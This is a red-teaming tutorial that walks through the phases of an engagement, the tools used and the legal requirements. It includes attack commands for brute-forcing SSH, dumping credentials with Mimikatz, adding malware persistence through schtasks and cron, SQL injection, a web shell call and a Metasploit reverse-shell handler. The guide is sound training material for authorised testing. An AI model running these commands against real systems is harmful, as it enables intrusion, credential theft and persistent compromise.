Complete Cybersecurity Red Teaming Tutorial

1. Introduction to Red Teaming

In cybersecurity, a "Red Team" is a group of security professionals who simulate real-world cyberattacks against an organization's systems and defenses. Their primary goal is to **test the effectiveness of the organization's security controls, people, and processes** by attempting to achieve specific objectives (e.g., data exfiltration, system compromise) just as a real adversary would.

Red teaming is not just about finding vulnerabilities; it's about evaluating the blue team's (defenders') ability to detect, respond to, and recover from sophisticated attacks. It provides a realistic assessment of an organization's overall security posture and operational resilience.

Key Characteristics of Red Teaming:

• Adversary Emulation: Mimicking the TTPs (Tactics, Techniques, and Procedures) of real-world threat actors.
• Goal-Oriented: Focused on achieving specific, pre-defined objectives, not just finding as many vulnerabilities as possible.
• Stealth & Evasion: Attempts to operate covertly to avoid detection by the blue team.
• Holistic Approach: Often involves multiple attack vectors (technical, physical, social engineering).
• Realistic: Designed to provide a true picture of an organization's defensive capabilities under pressure.

2. Red Team vs. Penetration Testing

While often conflated, Red Teaming and Penetration Testing are distinct activities with different scopes and objectives:

3. The Red Team Engagement Lifecycle

A typical red team engagement follows a structured methodology, often iterative and adaptive.

1. Planning & Preparation: Define objectives, scope, rules of engagement, and obtain authorization. Conduct initial reconnaissance.
2. Initial Access: Gain a foothold into the target environment.
3. Enumeration & Discovery: Map the internal network, identify critical assets, users, and potential pathways.
4. Privilege Escalation: Increase access levels from a low-privilege foothold to higher privileges.
5. Lateral Movement: Move from one compromised system to another within the network.
6. Persistence: Establish mechanisms to maintain access over time, even after reboots or detection attempts.
7. Collection & Exfiltration: Gather target data (e.g., intellectual property, credentials) and covertly remove it from the network.
8. Achieve Objectives & Impact: Fulfill the defined engagement goals (e.g., modify data, disrupt service).
9. Reporting & Cleanup: Document findings, provide recommendations, and remove all traces of the red team's presence.

This lifecycle largely mirrors the MITRE ATT&CK Framework tactics and the Cyber Kill Chain, providing a common language for adversary behavior.

4. Phase 1: Planning & Reconnaissance

This is the intelligence gathering phase, crucial for understanding the target before any active interaction.

A. Planning:

• Define Objectives (Flags): What specific outcomes should the red team achieve? (e.g., "Exfiltrate customer database," "Gain Domain Admin on Active Directory," "Access financial records system").
• Scope: What systems, networks, personnel, or locations are in scope? What's out of scope?
• Rules of Engagement (ROE): Legal and ethical boundaries, acceptable techniques (e.g., no DDoS, no real data deletion), notification procedures (when to stop or alert).
• Communication Plan: How will the red team communicate with the client, especially in case of emergency or "go/no-go" decisions?
• Team Formation: Assign roles and responsibilities within the red team.

B. Reconnaissance (OSINT - Open Source Intelligence):

Gathering information about the target from publicly available sources without directly interacting with the target system.

• Website Analysis: Look for employee names, email formats, technologies used (e.g., headers, Wappalyzer), internal documents.

  # Tools: Browser Developer Tools, Wappalyzer (browser extension)

• Social Media: LinkedIn (employee roles, hierarchy), Twitter, Facebook for public statements, employee activities.
• Search Engines: Google Dorking for exposed files, directories, subdomains.

  # Google Dorks examples:
  site:example.com intitle:"index of" "password"
  site:example.com filetype:pdf "confidential"
  inurl:admin login site:example.com

• DNS Information: MX records (email servers), NS records, A/AAAA records for IP addresses.

  # Tools: dig, nslookup
  dig example.com MX
  dig example.com ANY

• WHOIS Lookups: Domain registration details.

  # Tool: whois
  whois example.com

• Shodan/Censys: Search engine for Internet-connected devices to find exposed services and devices.
• Subdomain Enumeration: Identifying subdomains associated with the target's primary domain.

  # Tools: Amass, Subfinder, dnsrecon, crt.sh (certificate transparency logs)
  amass enum -d example.com
  subfinder -d example.com

• Email Harvesting: Collecting valid email addresses for social engineering.

  # Tools: theHarvester (often used for OSINT)
  theharvester -d example.com -l 500 -b google,linkedin

C. Active Reconnaissance (with caution as it might be detected):

Interacting directly with the target systems to gather information. This carries a higher risk of detection.

• Port Scanning: Identifying open ports and services on target systems.

  # Tool: Nmap
  nmap -sS -p- -T4 example.com   # SYN scan, all ports, faster timing
  nmap -sV -p 80,443 example.com # Service version detection on specific ports

• Vulnerability Scanning (light): Identifying potential vulnerabilities without exploitation.
• Web Content Discovery: Discovering hidden directories and files.

  # Tools: dirb, gobuster, ffuf
  gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

5. Phase 2: Initial Access

Gaining the first foothold inside the target network.

• Phishing/Spear Phishing: Sending deceptive emails to trick users into revealing credentials, clicking malicious links, or opening malicious attachments.

  # Techniques: Credential harvesting, malware delivery (e.g., macro-enabled documents, malicious executables)
  # Tools: GoPhish (phishing framework), EvilGinx (phishing proxy)

• Exploiting Public-Facing Applications: Identifying and exploiting vulnerabilities in web applications (e.g., SQL Injection, XSS, RCE), APIs, or services exposed to the internet.

  # Tools: Burp Suite, OWASP ZAP, Metasploit, specific exploit scripts
  # SQL Injection example (conceptual):
  # target.com/products?id=1 UNION SELECT @@version, user(), database() --
  
  # Remote Code Execution (RCE) via web shell upload:
  # Upload a simple PHP web shell: 
  # Then access: target.com/uploads/shell.php?cmd=whoami

• Supply Chain Attacks: Compromising a third-party vendor or software update process.
• Physical Access: Gaining physical entry to a facility to plant devices (e.g., "Pwnagotchi," USB drop) or access internal systems directly.
• Weak/Default Credentials: Brute-forcing or guessing weak passwords, or exploiting default credentials on devices/services.

  # Tools: Hydra (for network services), Medusa, Nmap scripts (e.g., http-brute)
  hydra -L users.txt -P passwords.txt ssh://target_ip

• Client-Side Exploits: Leveraging vulnerabilities in client-side software (browsers, PDF readers) when a user visits a malicious page.

  # Tool: Metasploit Framework (Browser Exploitation Framework - BeEF integration)

6. Phase 3: Enumeration & Privilege Escalation

Once initial access is gained, the red team needs to understand the compromised environment and elevate their privileges.

A. Enumeration & Discovery:

Mapping the internal network, identifying active hosts, services, users, and critical assets.

• Network Scanning: Internal port scans, network mapping.

  # Tools: Nmap, Masscan, Responder (for LLMNR/NBT-NS poisoning)
  nmap -Pn -sC -sV 192.168.1.0/24 # Scan internal subnet
  responder -I eth0 -wrf # Start Responder to capture hashes

• Active Directory Enumeration: Identifying domain users, groups, computers, domain controllers, and trust relationships.

  # Tools (Windows): PowerView (part of PowerSploit), BloodHound (for visualizing attack paths)
  # PowerShell example for basic AD recon:
  Get-ADUser -Filter * -Properties * | select Name, SamAccountName, Enabled
  Get-ADComputer -Filter * | select Name, OperatingSystem

• Service Enumeration: Identifying misconfigured services, vulnerable applications.
• File System Analysis: Searching for sensitive files (config files, backups, password files).
• Registry Analysis (Windows): Looking for persistence mechanisms, sensitive data.

B. Privilege Escalation:

Increasing access from a low-privilege user (e.g., standard user) to a higher-privilege user (e.g., Administrator, SYSTEM, Domain Admin).

• Kernel Exploits: Exploiting vulnerabilities in the operating system kernel.
• Misconfigurations: Exploiting weak file permissions, unpatched software, insecure service configurations.

  # Linux: SUID/GUID exploits, cron job misconfigurations, writable /etc/passwd
  # Tools: LinPEAS, Linux-Exploit-Suggester
  
  # Windows: Weak service permissions, unquoted service paths, AlwaysInstallElevated, UAC bypasses
  # Tools: WinPEAS, PowerUp (part of PowerSploit), PrintSpoofer, Potato attacks

• Stored Credentials: Harvesting credentials from memory, configuration files, or the registry.

  # Tools: Mimikatz (Windows), LaZagne (Windows/Linux/macOS)
  # Mimikatz to dump LSA secrets (requires admin):
  sekurlsa::logonpasswords

• Pass-the-Hash/Ticket: Using stolen hashes or Kerberos tickets to authenticate without cracking the password.

7. Phase 4: Lateral Movement & Persistence

After gaining elevated privileges on one system, the red team moves across the network and establishes ways to maintain access.

A. Lateral Movement:

Techniques used to move from one compromised system to another within the network, often to reach target systems or gain further access.

• PsExec (Windows): Remotely executing commands on other Windows machines.

  # Requires admin credentials on target:
  psexec.exe \\target_ip cmd.exe

• WinRM/PowerShell Remoting (Windows): Using PowerShell to connect and execute commands remotely.

  # Example PowerShell:
  Enter-PSSession -ComputerName TargetServer

• SSH/RDP (Linux/Windows): Using legitimate remote access protocols with compromised credentials.
• SMB/WMI (Windows): Using Server Message Block (file sharing) or Windows Management Instrumentation for remote execution.
• Kerberoasting/AS-REPRoasting (Active Directory): Attacking Kerberos to gain service account hashes or unauthenticated user hashes.
• Abusing Trust Relationships: Leveraging trusts between domains or services.

B. Persistence:

Establishing mechanisms to maintain access to compromised systems or networks, even after reboots or detection attempts by the blue team.

• Backdoors: Creating hidden access points (e.g., custom web shells, malicious services).
• Scheduled Tasks (Windows/Linux): Creating cron jobs or scheduled tasks to re-execute malware or provide persistent access.

  # Windows:
  schtasks /create /tn "MyTask" /tr "C:\path\to\malware.exe" /sc ONLOGON /ru SYSTEM
  
  # Linux:
  (crontab -l; echo "@reboot /path/to/script.sh") | crontab -

• Startup Folders/Registry Run Keys (Windows): Placing malicious executables in locations that run on system startup.
• Service Creation (Windows/Linux): Installing new malicious services.
• DLL Hijacking: Placing a malicious DLL in a location where a legitimate application will load it.
• Hooking/Patching: Modifying legitimate system binaries or libraries.
• Compromised Accounts: Maintaining control over highly privileged accounts (e.g., Domain Admin, root).

8. Phase 5: Exfiltration & Impact

The final stages of an attack, where the red team achieves its core objectives.

A. Collection:

Identifying and gathering specific data of value from target systems.

• Sensitive Files: Documents, spreadsheets, source code, backup files.
• Databases: Full database dumps, specific tables.
• Credentials: Password hashes, private keys, API keys.
• Intellectual Property: Designs, research, trade secrets.
• Email Archives: Employee emails.

B. Exfiltration:

Covertly transferring the collected data out of the target network without detection.

• DNS Tunneling: Encoding data within DNS queries/responses.
• HTTP/S C2: Using common web traffic to disguise data transfer.
• Cloud Storage: Uploading to public cloud storage if access is gained.
• Encrypted Channels: Using encrypted channels like SSH or VPNs.
• Covert Channels: Embedding data in legitimate traffic (e.g., steganography).
• Direct Copy: Less covert, but still effective in some scenarios.

C. Impact (Achieving Objectives):

Executing the final objectives of the engagement, which might involve more than just data theft.

• Data Modification/Corruption: Altering or destroying critical data.
• System Disruption: Causing Denial of Service (DoS) or system shutdowns.
• Defacement: Modifying public-facing websites.
• Ransomware Simulation: Encrypting files (without actual encryption keys being lost) to test recovery.
• Access to Specific Systems: Gaining control over a critical business application.

9. Phase 6: Reporting & Cleanup

The most crucial phase for the client, translating technical findings into actionable intelligence.

• Detailed Report:
  • Executive Summary: Non-technical overview of findings and impact.
  • Scope and Objectives: Reiterate what was tested and why.
  • Attack Narrative/Kill Chain: Step-by-step breakdown of how objectives were achieved, linking to MITRE ATT&CK.
  • Findings: Specific vulnerabilities exploited, misconfigurations, and weaknesses in detection/response.
  • Evidence: Screenshots, command outputs, log snippets.
  • Recommendations: Actionable advice for improving security controls, people, and processes.
  • Timeline of Activities: When key actions occurred (for blue team to compare with their logs).
• Debriefing: Presenting findings to the client, especially the blue team, to provide valuable feedback and facilitate purple teaming exercises.
• Cleanup: Ensuring all deployed tools, backdoors, and persistence mechanisms are removed from the client's environment. This is critical for ethical reasons and to avoid leaving real vulnerabilities.
• Lessons Learned: Both for the client and the red team, identifying what worked, what didn't, and how to improve future engagements.

10. Tools of the Red Team

Red teamers use a wide array of specialized tools, often from Kali Linux or custom-developed ones.

• Operating Systems: Kali Linux, Parrot OS (security-focused distributions).
• Information Gathering:
  • Network Scanners: Nmap, Masscan.
  • Subdomain Enumeration: Amass, Subfinder, dnsrecon.
  • OSINT Tools: theHarvester, Maltego, public search engines.
• Vulnerability Analysis:
  • Web Scanners: Nikto, Nessus/OpenVAS (can be used passively).
  • Web Proxies: Burp Suite (Community/Pro), OWASP ZAP (for web app testing).
• Exploitation Frameworks:
  • Metasploit Framework: Huge database of exploits, payloads, and post-exploitation modules.

    # Example Metasploit usage
    msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST <your_ip>
    set LPORT 4444
    exploit

  • Cobalt Strike (Commercial): Advanced adversary emulation platform, highly favored for stealthy operations.
• Social Engineering Tools:
  • SET (Social-Engineer Toolkit): For phishing, credential harvesting, Java applet attacks.
  • GoPhish: Open-source phishing framework.
  • EvilGinx: Man-in-the-middle phishing framework.
• Privilege Escalation:
  • Linux: LinPEAS, Linux-Exploit-Suggester, DirtyCow (old but classic example).
  • Windows: WinPEAS, PowerUp, Mimikatz, PrintSpoofer, BloodHound (for AD attack path mapping).
• Credential Access:
  • Mimikatz: Extracts passwords, hashes, Kerberos tickets from memory (Windows).
  • Responder: Captures NTLMv1/v2 hashes via LLMNR/NBT-NS poisoning.
  • Hashcat/John the Ripper: Password crackers.
• Lateral Movement:
  • PsExec, Impacket Suite (Python): For Windows lateral movement.
  • SSH/RDP: Standard remote access.
• Persistence: Custom backdoors, scheduled tasks, service creation tools.
• C2 (Command and Control) Frameworks: Cobalt Strike, Metasploit (Meterpreter), Empire (PowerShell/Python post-exploitation), Covenant (C#).
• Payload Generation: MSFvenom (part of Metasploit), Donut, custom C/C++/Python/PowerShell scripts.
• OpSec (Operational Security) Tools: VPNs, proxies, virtual machines, custom infrastructure for C2.

11. Red Teaming Tradecraft

Beyond tools, successful red teaming requires specific methodologies and techniques.

• OpSec (Operational Security): Protecting the red team's own operations from detection. This includes:
  • Using clean infrastructure (VPS, VPNs, proxies).
  • Avoiding common IOCs.
  • Stealthy tool usage (e.g., living off the land binaries - LOLBINs).
  • Minimizing network noise.
• Living Off The Land (LOTL): Using tools and features already present on the target system (e.g., PowerShell, `certutil`, `wmic`, `schtasks` on Windows; `bash`, `ssh`, `curl` on Linux) to perform malicious actions. This makes detection harder as the activity looks like legitimate system behavior.
• Custom Tooling: Developing unique malware, exploits, or scripts to bypass specific defenses.
• Social Engineering Skills: Persuasion, manipulation, understanding human psychology.
• Physical Security Bypass: Techniques to gain physical access (e.g., lock picking, tailgating, badge cloning - under strict ROE).
• Evading Detection:
  • Using encryption for C2 traffic.
  • Changing C2 channels frequently.
  • Obfuscating code.
  • Timing attacks during off-hours or peak legitimate traffic.
  • Anti-forensics techniques.
• Emulating Adversary Groups: Researching specific APT (Advanced Persistent Threat) groups or criminal organizations and replicating their known TTPs. This makes the exercise highly realistic for the blue team.

12. Purple Teaming

Purple Teaming is a collaborative approach where red and blue teams work together to improve an organization's security posture. It breaks down the traditional silos and fosters continuous learning.

• Objectives:
  • Improve blue team's detection and response capabilities.
  • Validate and enhance security controls.
  • Foster knowledge sharing between offensive and defensive teams.
  • Test specific hypotheses about adversary behavior.
• Process:
  1. Red team executes a specific attack technique (e.g., a known MITRE ATT&CK TTP).
  2. Blue team attempts to detect and respond in real-time, observing their tools and processes.
  3. Both teams then debrief, analyze logs, and share insights.
  4. Blue team implements improvements based on findings.
  5. The technique might be re-tested to validate improvements.
• Benefits: Immediate feedback loop, direct enhancement of security posture, improved team collaboration and understanding.

13. Career Path & Certifications

A career in red teaming is highly specialized and requires significant experience, often starting from penetration testing or blue teaming.

Common Career Roles:

• Red Team Operator
• Adversary Emulation Engineer
• Offensive Security Engineer
• Penetration Tester (often a prerequisite or entry point)

Relevant Certifications:

• Entry-Level/Foundation (often helpful pre-requisites):
  • CompTIA PenTest+
  • eJPT (eLearnSecurity Junior Penetration Tester)
• Core Red Teaming/Advanced Pen Testing:
  • OSCP (Offensive Security Certified Professional): Highly regarded, practical certification for offensive security.
  • OSWE (Offensive Security Web Expert)
  • OSEP (Offensive Security Exploitation Expert)
  • OSED (Offensive Security Exploit Developer)
  • CRTP (Certified Red Team Professional): Focuses on Active Directory Red Teaming.
  • CRTO (Certified Red Team Operator): Focuses on red team operations.
  • eCPTX (eLearnSecurity Certified Penetration Tester eXtreme)
• GIAC Certifications (More theoretical but highly valued):
  • GPEN (GIAC Penetration Tester)
  • GWAPT (GIAC Web Application Penetration Tester)
  • GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)

14. Legal & Ethical Considerations

Red teaming involves simulating illegal activities, so strict legal and ethical boundaries are paramount.

• Explicit Authorization: A detailed Scope of Work (SOW) and "get out of jail free" cards must be in place, signed by all relevant parties (legal, senior management, IT/security).
• Rules of Engagement (ROE): Clearly defined dos and don'ts (e.g., no data deletion, no DDoS, no physical harm).
• "No-Go" Scenarios: Pre-defined conditions under which the red team must immediately stop operations (e.g., disruption of critical services, detection by law enforcement).
• Professionalism & Ethics: Red teamers must adhere to a strict code of ethics, acting responsibly and within authorized boundaries.
• Legal Frameworks: Be aware of local and international laws regarding computer hacking and data privacy.
• Transparency (Post-Engagement): Full disclosure of methods, findings, and tools used during the engagement.